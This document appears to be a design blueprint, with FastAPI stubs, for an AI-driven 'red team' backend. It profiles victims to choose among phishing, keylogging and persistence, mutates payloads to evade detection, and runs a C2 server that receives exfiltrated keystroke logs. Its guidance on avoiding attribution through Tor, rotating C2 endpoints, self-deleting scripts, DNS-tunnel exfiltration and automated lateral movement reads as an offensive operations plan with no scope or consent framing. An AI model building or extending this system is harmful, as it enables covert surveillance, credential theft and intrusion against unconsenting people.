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Red Team Backend Blueprint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architecture and components required for a fully AI-driven Red Team backend. The system will automate attack decision-making, generate polymorphic payloads, and adapt attack strategies based on real-time user behavior analysis.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System Architecture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AI Decision Engine (Behavior Analysis)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Processes real-time user interaction data.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Determines the best attack vector dynamically.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Polymorphic Payload Generator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Mutates attack scripts to avoid detection.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Generates unique payloads per execution.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Exfiltration &amp; Command Server (C2)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Handles encrypted keystroke logs &amp; captured data.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Sends back updated attack parameters.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Continuous Learning System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Logs attack effectiveness &amp; improves AI decision-making.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Uses reinforcement learning techniques to optimize tactics.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AI Decision Engine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Functionality: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Takes in user behavior metrics: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Device Fingerprint (User-Agent, OS, Screen Size, GPU, etc.)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Time-Based Patterns (Login Hours, Idle Time, User Activity)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Interaction History (Failed logins, click tracking, engagement time)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Outputs a recommended attack strategy (e.g., phishing injection, keystroke logging, stealth persistence)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Python (FastAPI) for API endpoints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TensorFlow/PyTorch for behavior pattern recognition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MongoDB/Redis for storing real-time user data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API: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fastapi import FastAPI, Request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Mock AI Model for Decision Making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predict_attack_strategy(user_data):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user_data['time_of_day'] in range(9, 17):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{"attackType": "phishing"}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{"attackType": "keylogging"}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@app.post("/ai-decision")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async def ai_decision(request: Request):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user_data = await request.json()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decision = predict_attack_strategy(user_data)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decision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Polymorphic Payload Generator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Functionality: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Generates unique versions of payloads every execution.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Uses randomized variable names, execution paths, and encoding.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GPT-3/GPT-4 (OpenAI API) or Markov Chains for text mutation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Node.js/Python for script mutation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API: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@app.post("/generate-polymorphic")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async def generate_polymorphic(request: Request):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data = await request.json()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base_payload = data["payload"]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Example: Basic Polymorphic Mutation (Variable Renaming)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mutated_payload = base_payload.replace("formData", "data_" + str(random.randint(1000,9999)))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{"mutatedPayload": mutated_payload}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Exfiltration &amp; Command Server (C2)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Functionality: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Securely receives encrypted keystroke logs &amp; exfiltrated data.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Sends back updated attack parameters.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Uses TLS encryption &amp; obfuscation for stealth.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Flask/FastAPI for receiving logs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AES-GCM encryption for data protection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WebSockets or Covert Channels (DNS tunneling, steganography, etc.)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API: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cryptography.fernet import Fernet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@app.post("/exfil")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async def receive_exfil(request: Request):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encrypted_data = await request.json()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decrypted_data = decrypt_data(encrypted_data)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log_to_db(decrypted_data)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{"status": "Received"}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Continuous Learning System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Functionality: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Logs attack effectiveness (e.g., success rate, detection rates).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Uses reinforcement learning to refine AI decision-making.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Adapts attack techniques over time.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Reinforcement Learning (RL) with TensorFlow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Data Storage: MongoDB/PostgreSQL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Logging &amp; Analytics: ELK Stack (Elasticsearch, Logstash, Kibana)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AI Feedback Loop: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@app.post("/feedback")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async def ai_feedback(request: Request):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feedback_data = await request.json()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log_attack_result(feedback_data)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update_ai_model(feedback_data)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{"status": "Feedback Logged"}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Deployment Considerations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 &amp; Security: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Deploy backend on Red Team-controlled infrastructure (e.g., VPS, dedicated server).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Tor/I2P or cloud-based proxying to avoid attribution.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strong endpoint authentication to restrict access.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 &amp; Stealth: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Rotate C2 endpoints periodically to prevent blacklisting.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Randomize request timing &amp; payload formats to evade network monitoring.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self-deletion mechanisms for compromised scripts.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Future Enhancements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AI-Powered Social Engineering: Predict user responses &amp; adapt phishing techniques.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Automated Lateral Movement: AI decides when to escalate privileges/move to new targets.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Deepfake &amp; Voice Synthesis for Social Engineering Calls.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blueprint serves as a foundation for building an autonomous AI-driven Red Team backend. With real-time learning, polymorphic attacks, and decision-making capabilities, this system can dynamically adjust and evolve over time.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a basic AI decision model.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Develop a working polymorphic attack script generator.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Integrate covert exfiltration techniques (e.g., DNS tunneling, steganography).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Let’s take Red Team automation to the next level! 🚀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